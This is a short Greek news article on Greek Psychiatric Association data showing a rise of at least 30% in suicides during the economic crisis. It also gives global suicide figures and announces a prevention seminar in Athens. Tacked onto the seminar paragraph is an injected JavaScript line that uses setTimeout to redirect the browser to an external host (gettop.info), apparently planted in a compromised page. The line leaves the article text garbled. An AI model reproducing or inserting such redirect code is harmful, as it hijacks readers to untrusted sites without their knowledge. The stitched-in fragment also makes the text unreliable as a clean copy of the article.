Αύξηση 30% των αυτοκτονιών στην Ελλάδα της κρίσης

0
6

 

Σύμφωνα με τα στοιχεία που παραθέτει η Ελληνική Ψυχιατρική Εταιρεία (ΕΨΕ), η Ελλάδα συγκαταλέγεται μεταξύ των χωρών που παρουσιάζουν αυξητικές τάσεις στις αυτοκαταστροφικές συμπεριφορές λόγω οικονομικής κρίσης.

Έτσι, η χώρα παρουσιάζει στα χρόνια της κρίσης μια αύξηση των αυτοκτονιών τουλάχιστον της τάξης 30% και ανάλογη αύξηση των αποπειρών αυτοκτονίας.

Έχει υπολογιστεί ότι κάθε χρόνο καταγράφονται περισσότερες από 1.000.000 αυτοκτονίες παγκοσμίως, μια αυτοκτονία πραγματοποιείται κάθε 20 δευτερόλεπτα ενώ μια απόπειρα πραγματοποιείται κάθε δευτερόλεπτο.

Η αυτοκτονία σήμερα συγκαταλέγεται μεταξύ των δέκα συχνοτέρων αιτιών θανάτου στο σύνολο του πληθυσμού και ανάμεσα στις τρεις συχνότερες αιτίες θανάτου για τους εφήβους και τους νεαρούς ενήλικες.

Αυριο Σάββατο διοργανώνεται επιστημονική Ημερίδα με θέμα: «Η πρόληψη των αυτοκαταστροφικών συμπεριφορών σε περίοδο κοινωνικο-οικονομικής κρίσης», από 9.30 το πρωί έως 15.30 στην αίθουσα συγκεντρώσεων του Ιατρικού Συλλόγου Αθηνών, οδός Σεβαστουπόλεως 113, στο πλαίσιο της Παγκόσμιας Ημέρας Πρόληψης των αυτοκτονιών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here